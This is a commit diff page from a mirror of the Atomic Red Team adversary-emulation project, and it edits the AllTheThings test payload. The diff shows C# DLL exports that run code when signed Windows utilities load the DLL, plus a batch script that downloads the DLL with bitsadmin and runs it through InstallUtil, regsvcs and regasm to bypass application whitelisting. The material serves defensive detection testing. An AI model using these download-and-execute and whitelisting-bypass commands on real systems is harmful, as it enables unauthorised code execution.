security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #165 from redcanaryco/fix-AllTheThings

Browse Source 
Fixing AllTheThings
This commit is contained in:
caseysmithrc
2018-05-16 10:22:51 -06:00
committed by GitHub
parent 907409acfc 87b9e66896
commit 1a9d60f78a
5 changed files with 22 additions and 23 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Payloads/AllTheThings/AllTheThingsx64.dll
Executable → Regular
BIN
View File
Binary file not shown.
Windows/Payloads/AllTheThings/AllTheThingsx86.dll
Executable → Regular
BIN
View File
Binary file not shown.
Windows/Payloads/AllTheThings/Program.cs
+22 -22
View File
@@ -141,32 +141,32 @@ class Exports
//
//
//rundll32 entry point
[DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
{
Thing0.Exec();
}
[DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
{
Thing0.Exec();
}
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
public static bool DllRegisterServer()
{
Thing0.Exec();
return true;
}
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
public static bool DllRegisterServer()
{
Thing0.Exec();
return true;
}
[DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
public static bool DllUUnregisterServer()
{
Thing0.Exec();
return true;
}
[DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
public static bool DllUUnregisterServer()
{
Thing0.Exec();
return true;
}
[DllExport("DllInstall", CallingConvention = CallingConvention.StdCall)]
public static void DllInstall(bool bInstall, IntPtr a)
{
string b = Marshal.PtrToStringUni(a);
Thing0.ExecParam(b);
}
public static void DllInstall(bool bInstall, IntPtr a)
{
string b = Marshal.PtrToStringUni(a);
Thing0.ExecParam(b);
}
}
Windows/Payloads/AllTheThings/test.bat
-1
View File
@@ -7,7 +7,6 @@ bitsadmin.exe /transfer "ATT" https://github.com/redcanaryco/atomic-red-team/raw
timeout /t 1 /nobreak > NUL
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
Windows/Payloads/AtomicSSLHook.dll
BIN
View File
Binary file not shown.